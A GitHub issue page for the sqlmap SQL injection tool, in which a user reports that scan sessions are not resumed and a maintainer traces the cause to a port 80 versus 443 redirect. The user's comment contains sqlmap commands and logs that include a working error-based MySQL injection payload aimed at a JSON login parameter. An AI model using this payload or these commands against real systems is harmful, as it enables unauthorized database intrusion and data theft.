search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.03k stars 5.68k forks source link

Sqlmap Dosen't Resume Injections #3148

Closed riteqylubu closed 6 years ago

riteqylubu commented 6 years ago

python sqlmap.py -r requestfile --dbms=MYSQl --tech=E

First RUN

[12:37:04] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:37:23] [INFO] (custom) POST parameter 'JSON username' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable (custom) POST parameter 'JSON username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 388 HTTP(s) requests:

Parameter: JSON username ((custom) POST) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: {"username":"sank") OR (SELECT 8115 FROM(SELECT COUNT(),CONCAT(0x71786a7871,(SELECT (ELT(8115=8115,1))),0x7176766271,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("vlnG"="vlnG","password":"f3ed11bbdb94fd9ebdefbaf646ab94d3"}

[12:37:34] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0 [12:37:34] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 243 times

Second RUn

python sqlmap.py -r requestfile --dbms=MYSQl --tech=E

[*] starting at 12:40:23

[12:40:23] [INFO] parsing HTTP request from 'pabloescobar' JSON data found in POST data. Do you want to process it? [Y/n/q] y [12:40:25] [INFO] testing connection to the target URL redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] [12:40:29] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON username' might be injectable (possible DBMS: 'MySQL') [12:40:30] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON username' might be vulnerable to cross-site scripting (XSS) attacks [12:40:30] [INFO] testing for SQL injection on (custom) POST parameter 'JSON username' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

Never Ever saves or resumes correctly

stamparm commented 6 years ago

Just to explain what was the problem in the first place. You've put Host: for port 80, while the target redirected you to the port 443. Realized with this example that this was indeed a "problem" for sqlmap as it treated those situations as different targets.